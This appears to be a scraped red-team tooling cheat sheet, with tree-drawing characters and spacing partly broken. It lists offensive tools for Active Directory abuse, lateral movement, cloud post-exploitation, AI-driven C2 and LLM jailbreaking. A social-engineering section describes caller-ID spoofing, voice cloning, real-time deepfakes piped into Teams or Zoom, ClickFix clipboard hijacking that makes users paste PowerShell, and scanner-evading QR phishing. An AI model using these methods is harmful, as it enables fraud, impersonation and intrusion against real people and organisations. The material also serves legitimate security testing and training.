ADCSSync / DSInternals // DCSync alternatives βββ keycred / SharpSuccessor // Shadow Credentials & BadSuccessor βββ bloodyAD / godap / ldap_shell // LDAP operations & ACL abuse βββ BloodHound-CE / ADExplorerSnapshot // Attack path mapping βββ ldapx / RelayInformer // LDAP proxy evasion & relay assessment βββ Misconfiguration-Manager / sccmhunter // SCCM attack tradecraft βββ SharpSphere / MemProcFS / Volumiser // vSphere attack & memory forensics LATERAL MOVEMENT βββ impacket suite // psexec, wmiexec, smbexec, atexec, dcomexec βββ evil-winrm / bof-winrm-client // WinRM shell & BOF client βββ CrackMapExec / NetExec // Network-wide enumeration & execution βββ SharpRDP / HiddenDesktop // RDP execution & HVNC βββ GoExec / wmiexec-Pro / atexec-pro // Advanced DCOM & WMI (port 135 only) βββ SCShell / Invoke-SMBRemoting // Fileless service & SMB lateral movement βββ incognito / elevate_pid_bof // Token impersonation & process token theft βββ SweetPotato / PrintSpoofer / GodPotato // Service account to SYSTEM escalation CLOUD OPERATIONS βββ GraphSpy / APEX / ROADtools // Azure/Entra ID post-exploitation βββ CredMaster / o365spray / TeamFiltration // M365 password spraying βββ AWSRoleJuggler / AWS-Key-Hunter // AWS persistence & key discovery βββ SeamlessPass / AAD BOFs // On-prem to cloud pivoting βββ DelePwn / CloudPEASS // GCP DWD abuse & cloud privesc AI / ML OFFENSIVE βββ Claude-C2 / Drone / Nerve // AI-driven C2 & autonomous agents βββ GhidraMCP / IDA Pro MCP / BloodHound-MCP // AI-assisted reverse engineering βββ LitterBox MCP / RamiGPT // Iterative evasion & auto-privesc βββ Deep-Live-Cam / DeepFaceLive // Real-time deepfake for video calls βββ Garak / PyRIT / L1B3RT4S // LLM red teaming & jailbreaking LAB INFRASTRUCTURE βββ Ludus / GOAD / Exegol // AD lab deployment & attack distros βββ AWSGoat / CloudFoxable // Vulnerable cloud labs (AWS) βββ PwnedLabs / Wiz CTF // Cloud security training & cyber ranges
// Social Engineering & Vishing
Caller ID Spoofing Infrastructure
StuntBanana: Minimalist Asterisk CID spoofer built for AWS deploymentBluffMyCall: SaaS alternative ~$30/month for quick CID spoofing without infra setupVoice Cloning & Real-Time Deepfake
Vapi.aifor real-time chatw-okada voice-changer: Local real-time voice conversion β ~250ms delay. Route through Voicemeeter PotatoDeep-Live-Cam: Real-time face swap with single image β 15+ FPS on modern GPU. Pipe through OBS into Teams/ZoomHedra: AI video creation for generating social engineering videos with fully faked charactersClickFix / Pastejacking
document.execCommand("copy")fires on interaction β user pastes base64-decoded PS commandrecaptcha-phish: Fake reCAPTCHA phishing page β same clipboard hijack techniqueQR Code Phishing (Quishing)
QRucible: Generates "imageless" QR codes using HTML/CSS/Unicode β evades image-based QR scannersTrusted Platform Abuse
targetname.zendesk.comβ support articles with payloadscompany.my.canva.siteβ trusted domainlots-project.comβ comprehensive catalog of living-off-trusted-sites techniquesPretext Library & Vishing Scenarios
pretext-project.github.ioβ open library of proven pretext ideas